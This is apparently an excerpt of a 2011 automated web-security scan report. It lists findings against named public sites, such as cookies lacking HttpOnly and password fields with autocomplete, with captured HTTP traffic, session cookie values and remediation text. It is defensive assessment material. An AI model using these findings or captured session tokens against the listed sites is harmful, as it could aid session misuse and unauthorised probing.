<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fhome">redirected</a>.</body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /docs/gated/campaigns/bpm_search3.htm HTTP/1.1
Host: web.progress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.progress.com/SmCreateCookie.ccc?SMSE ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:06:39 GMT
Server: Microsoft-IIS/7.0
Cache-Control: public
Content-Length: 99445
Content-Type: application/x-javascript; charset=utf-8
Expires: Tue, 01 May 2012 23:22:04 GMT
Last-Modified: Mon, 02 May 2011 23:22:04 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Set-Cookie: pwH75TpzXX=MDAwM2IyNGU3NzQwMDA2NDY0MDEwYBE/JH4xMzA0MzkwMTY2;path=/
Connection: close
//---------------------------------------------------------- // Copyright (C) Microsoft Corporation. All rights reserved. //---------------------------------------------------------- // MicrosoftAj ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:06:32 GMT
Server: Microsoft-IIS/7.0
Cache-Control: private,max-age=0
Content-Length: 19292
Content-Type: text/css
Last-Modified: Tue, 03 Aug 2010 12:13:08 GMT
ETag: "{3AFB89F0-1597-4AFD-8D80-6CC8FEC2A732},79"
ResourceTag: rt:3AFB89F0-1597-4AFD-8D80-6CC8FEC2A732@00000000079
Exires: Mon, 18 Apr 2011 00:03:11 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
Set-Cookie: pwH75TpzXX=MDAwM2IyNGU3NzQwMDA2NDY0MDEwAndPIlkxMzA0MzkwMTU5;path=/
Connection: close
/* STILE AM 2009 */
html, body {} html, body {font-family:"Lucida Sans Unicode","Lucida Grande",Verdana,Arial,Helvetica,sans-serif;} body {font-size:12px; margin:0; padding:0;} strong, em, b, i, ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:06:33 GMT
Server: Microsoft-IIS/7.0
Cache-Control: private,max-age=0
Content-Length: 17402
Content-Type: application/x-javascript
Last-Modified: Fri, 11 Dec 2009 14:44:45 GMT
ETag: "{56DF34FC-A182-47D6-98D5-5D12CA72330A},46"
ResourceTag: rt:56DF34FC-A182-47D6-98D5-5D12CA72330A@00000000046
Exires: Mon, 18 Apr 2011 00:02:47 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
Set-Cookie: pwH75TpzXX=MDAwM2IyNGU3NzQwMDA2NDY0MDEwORIaCQsxMzA0MzkwMTYw;path=/
Connection: close
function Main(Day, Month, Year, Glong, Glat, TimeNow, TimeZone, DayNum, ImageDay, ImageNight) { var OutString = ""; var calend; var quady = new Array; var sunp = new Array;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:06:35 GMT
Server: Microsoft-IIS/7.0
Cache-Control: max-age=31536000
Content-Type: application/x-javascript
Last-Modified: Wed, 08 Nov 2006 17:17:58 GMT
Accept-Ranges: bytes
ETag: "027f6d5593c71:0"
X-Powered-By: ASP.NET
Content-Length: 105258
Set-Cookie: pwH75TpzXX=MDAwM2IyNGU3NzQwMDA2NDY0MDEweQJwBzkxMzA0MzkwMTYy;path=/
Connection: close
var StrNewNamespace="http://schemas.microsoft.com/WebPart/v2"; function SplitIndex(Index) { var sPropURN=""; var sPropName=""; var pos=Index.lastIndexOf("#"); if( -1==pos ) { pos=Index. ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:06:34 GMT
Server: Microsoft-IIS/7.0
Cache-Control: max-age=31536000
Content-Type: application/x-javascript
Last-Modified: Fri, 21 Nov 2008 03:41:10 GMT
Accept-Ranges: bytes
ETag: "0cf40fe8a4bc91:0"
X-Powered-By: ASP.NET
Content-Length: 69979
Set-Cookie: pwH75TpzXX=MDAwM2IyNGU3NzQwMDA2NDY0MDEwf2AzTSoxMzA0MzkwMTYx;path=/
Connection: close
...function Browseris () { var agt=navigator.userAgent.toLowerCase(); this.osver=1.0; if (agt) { var stOSVer=agt.substring(agt.indexOf("windows ")+11); this.osver=parseFloat(stOSVer);
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:06:35 GMT
Server: Microsoft-IIS/7.0
Cache-Control: max-age=31536000
Content-Type: application/x-javascript
Last-Modified: Mon, 13 Nov 2006 01:43:56 GMT
Accept-Ranges: bytes
ETag: "056642ec56c71:0"
X-Powered-By: ASP.NET
Content-Length: 4260
Set-Cookie: pwH75TpzXX=MDAwM2IyNGU3NzQwMDA2NDY0MDEwX2NvUTkxMzA0MzkwMTYy;path=/
Connection: close
...function MSOWebPartPage_GetLocalizedStrings() { var L_ResetPagePersonalizationDialog_TXT="Tutte le web part personalizzate verranno reimpostate sui relativi valori condivisi e le eventuali web p ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.altergaz.fr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Set-Cookie: fe_typo_user=a61d48dbb4958bc70d275865af261a96; path=/
Connection: close
Content-Type: text/html; charset=iso-8859-15
Content-Length: 22446
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.camera.it
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /1 HTTP/1.1
Host: www.camera.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _xmcamera=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsIOgtub3RpY2UwOgplcnJvcjA6DHdhcm5pbmcwBjoKQHVzZWR7CDsG%250AVDsHVDsIVA%253D%253D--84f86c2ccc477bfc838891a4b6e8156295c20250;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.distrigas.eu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Connection: close
Date: Mon, 02 May 2011 22:29:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Generated-By: Smartsite iXperion version 1.1.239.2
Location: http://www.distrigas.eu/Content/Intro.html
Set-Cookie: DistrigasPrd_guid=04e53fb0-c72a-4e30-a4e6-ae4f019a6ae1; expires=Tue, 01-May-2012 22:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=vbq2nn552gxbt1ytt0gnne55; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 159
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.distrigas.eu/Content/Intro.html">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.energyfordevelopment.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Date: Mon, 02 May 2011 22:29:59 GMT
Location: http://www.eni.com/en_IT/energy-for-development
Content-Length: 255
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: TS782077=9c1888cf55d1ed60c1dc7e8ec33b9df22bf72ca75ced7b654dbf3067; Path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.eni.com/en_I ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.eni.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.eni.com/en_I ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 23:56:07 GMT
Last-Modified: Fri, 23 Nov 2007 17:18:15 GMT
ETag: "10e6e-4b2-ccc843c0"
Accept-Ranges: bytes
Content-Length: 1202
Content-Type: text/html
Set-Cookie: TS782077=11a595a37cc910c0139fc7e1bfd8a6ae890c9539588bfa0e4dbf4496; Path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" con ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /attachments/azienda/profilo-compagnia/eni_sintesi_eng.pdf HTTP/1.1
Host: www.eni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=kyRMN1sbqWqGzncyJW4WbfPF2w7n8bdv9SYHRTc7ZYJktn5rHVXg!-2020469318; TS782077=89ee84e16a43f8e45319ff52ca76dd83212a69bccb46787c4dbf2c78; WT_FPC=id=173.193.214.243-768797744.30148886:lv=1304414014591:ss=1304414014591;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:59 GMT
Last-Modified: Fri, 18 Feb 2011 16:25:19 GMT
ETag: "28228-70200-f5bef9c0"
Accept-Ranges: bytes
Content-Length: 459264
Connection: close
Content-Type: application/pdf
Set-Cookie: TS782077=b68bf7a0a48de83f01a85b36ebfb4752212a69bccb46787c4dbf3067; Path=/
%PDF-1.7%.... 14 0 obj<</Linearized 1/L 380095/O 16/E 293952/N 2/T 379700/H [ 3296 525]>>endobj xref14 1500000000016 00000 n 0000003821 00000 n 0000003992 00000 n 0000005004 0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /attachments/media/press-release/2010/10/press-release-2010-third-quarter-results.pdf HTTP/1.1
Host: www.eni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=kyRMN1sbqWqGzncyJW4WbfPF2w7n8bdv9SYHRTc7ZYJktn5rHVXg!-2020469318; TS782077=89ee84e16a43f8e45319ff52ca76dd83212a69bccb46787c4dbf2c78; WT_FPC=id=173.193.214.243-768797744.30148886:lv=1304414014591:ss=1304414014591;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:59 GMT
Last-Modified: Tue, 02 Nov 2010 15:12:45 GMT
ETag: "42c70-1f7c7e-5b5db540"
Accept-Ranges: bytes
Content-Length: 2063486
Connection: close
Content-Type: application/pdf
Set-Cookie: TS782077=b68bf7a0a48de83f01a85b36ebfb4752212a69bccb46787c4dbf3067; Path=/
%PDF-1.5%.... 132 0 obj<</Linearized 1/L 345754/O 134/E 69693/N 44/T 342998/H [ 1376 1442]>>endobj xref132 540000000016 00000 n 0000002818 00000 n 0000002920 00000 n 0000003421 0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /attachments/media/press-release/2011/02/press-release-2010-fourth-quarter-results.pdf HTTP/1.1
Host: www.eni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=kyRMN1sbqWqGzncyJW4WbfPF2w7n8bdv9SYHRTc7ZYJktn5rHVXg!-2020469318; TS782077=89ee84e16a43f8e45319ff52ca76dd83212a69bccb46787c4dbf2c78; WT_FPC=id=173.193.214.243-768797744.30148886:lv=1304414014591:ss=1304414014591;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:59 GMT
Last-Modified: Fri, 18 Feb 2011 15:46:18 GMT
ETag: "3d396-3e0a86-6a362680"
Accept-Ranges: bytes
Content-Length: 4065926
Connection: close
Content-Type: application/pdf
Set-Cookie: TS782077=b68bf7a0a48de83f01a85b36ebfb4752212a69bccb46787c4dbf3067; Path=/
%PDF-1.3%.... 145 0 obj <</Linearized 1/L 437664/O 147/E 96545/N 50/T 434716/H [ 1396 1369]>>endobj xref 145 55 0000000016 00000 n 0000002765 00000 n 0000002866 00000 n 0000003351 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /attachments/media/press-release/2011/04/press-release-2011-first-quarter-results.pdf HTTP/1.1
Host: www.eni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=kyRMN1sbqWqGzncyJW4WbfPF2w7n8bdv9SYHRTc7ZYJktn5rHVXg!-2020469318; TS782077=89ee84e16a43f8e45319ff52ca76dd83212a69bccb46787c4dbf2c78; WT_FPC=id=173.193.214.243-768797744.30148886:lv=1304414014591:ss=1304414014591;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:30:01 GMT
Last-Modified: Wed, 27 Apr 2011 10:58:44 GMT
ETag: "43d18-89a9a-53008100"
Accept-Ranges: bytes
Content-Length: 563866
Connection: close
Content-Type: application/pdf
Set-Cookie: TS782077=804c4d0ed7500992d2b3fd3460f7dfcf212a69bccb46787c4dbf3069; Path=/
%PDF-1.5%.... 115 0 obj<</Linearized 1/L 384938/O 117/E 54050/N 39/T 382522/H [ 1196 1346]>>endobj xref115 450000000016 00000 n 0000002542 00000 n 0000002644 00000 n 0000003119 0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /attachments/publications/reports/reports-2009/Eni-in-2009.pdf HTTP/1.1
Host: www.eni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=kyRMN1sbqWqGzncyJW4WbfPF2w7n8bdv9SYHRTc7ZYJktn5rHVXg!-2020469318; TS782077=89ee84e16a43f8e45319ff52ca76dd83212a69bccb46787c4dbf2c78; WT_FPC=id=173.193.214.243-768797744.30148886:lv=1304414014591:ss=1304414014591;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:30:24 GMT
Last-Modified: Wed, 04 Aug 2010 10:44:59 GMT
ETag: "1f5a5-e3b92b-200a40c0"
Accept-Ranges: bytes
Content-Length: 14924075
Connection: close
Content-Type: application/pdf
Set-Cookie: TS782077=0990764a7a46e640eb200f24e6af5418212a69bccb46787c4dbf307f; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:19:02 GMT
Last-Modified: Fri, 23 Nov 2007 17:18:15 GMT
ETag: "10e6e-4b2-ccc843c0"
Accept-Ranges: bytes
Content-Length: 1202
Content-Type: text/html
Set-Cookie: TS782077=5d49424e190a245063ff5ee0922b91a6212a69bccb46787c4dbf2dd6; Path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" con ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:19:05 GMT
Last-Modified: Fri, 23 Nov 2007 17:18:15 GMT
ETag: "10e6e-4b2-ccc843c0"
Accept-Ranges: bytes
Content-Length: 1202
Content-Type: text/html
Set-Cookie: TS782077=a5e92bf5adae60507c76683cb270ea93212a69bccb46787c4dbf2dd9; Path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" con ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.eni.it
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.eni.com/">he ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.eni.com/mobi ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
wwweni=r2744327987; path=/; expires=Fri, 1 Jan 2010 01:01:50 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /?home_2010_en_tab=header_tools HTTP/1.1
Host: www.eni.mobi
Proxy-Connection: keep-alive
Referer: http://www.eni.com/en_IT/home.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 301 Moved Permanently
Set-Cookie: wwweni=r2744327987; path=/; expires=Fri, 1 Jan 2010 01:01:50 GMT
Date: Mon, 02 May 2011 23:55:17 GMT
Server: Apache
Location: http://www.eni.it/mobile/page.do?locale=it_IT&content=home
Content-Length: 270
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.eni.it/mobil ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /150772050830724/wt.pl?p=203,us,1,1920x1200,16,1,1304392516867,0,1074x903,1&tz=-5&enc1=?&enc2=utf-8utf-8&la=en-US&cg1=WEBSITE&cg2=US&cg3=HOME&np=Shockwave%20Flash%7CJava HTTP/1.1
Host: zanox01.webtrekk.net
Proxy-Connection: keep-alive
Referer: http://www.zanox.com/us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Set-Cookie: wteid_150772050830724=4130437487300145330; Expires=Tue, 05-Apr-2016 22:21:13 GMT
Set-Cookie: wtsid_150772050830724=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, private, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 02 May 2011 22:21:13 GMT
P3P: policyref="http://track.webtrekk.de/w3c/p3p.xml", CP="NOI DSP IND COM NAV INT"
Content-Type: image/gif;charset=UTF-8
Content-Length: 43
Date: Mon, 02 May 2011 22:21:12 GMT
Server: q3/4
GIF89a.............!.......,...........D..;
16. Password field with autocomplete enabled
There are 28 instances of this issue:
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The form contains the following password fields with autocomplete enabled:
password
passwordConfirm
Request
GET /utenti/Registrazione.aspx HTTP/1.1
Host: du.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 22:24:07 GMT
Server: Microsoft-IIS/6.0
SERVER: PRODFE1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /utenti/facebook_connect.aspx HTTP/1.1
Host: du.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 22:24:07 GMT
Server: Microsoft-IIS/6.0
SERVER: PRODFE1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:30:24 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 6649
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head>
HTTP/1.0 200 OK
Date: Mon, 02 May 2011 21:30:41 GMT
Last-Modified: Mon, 02 May 2011 21:30:41 GMT
Set-Cookie: MIAMISESSION=4d1567b8-7503-11e0-b300-00008a0c593d:3481824641; path=/; domain=.sciencedirect.com; HttpOnly;
Content-Type: text/html
Expires: Tue, 01 Jan 1980 04:00:00 GMT
X-RE-Ref: 0 -1136083128
Server: www.sciencedirect.com 9999 138.12.6.33:443
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd" > <html> <head>
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.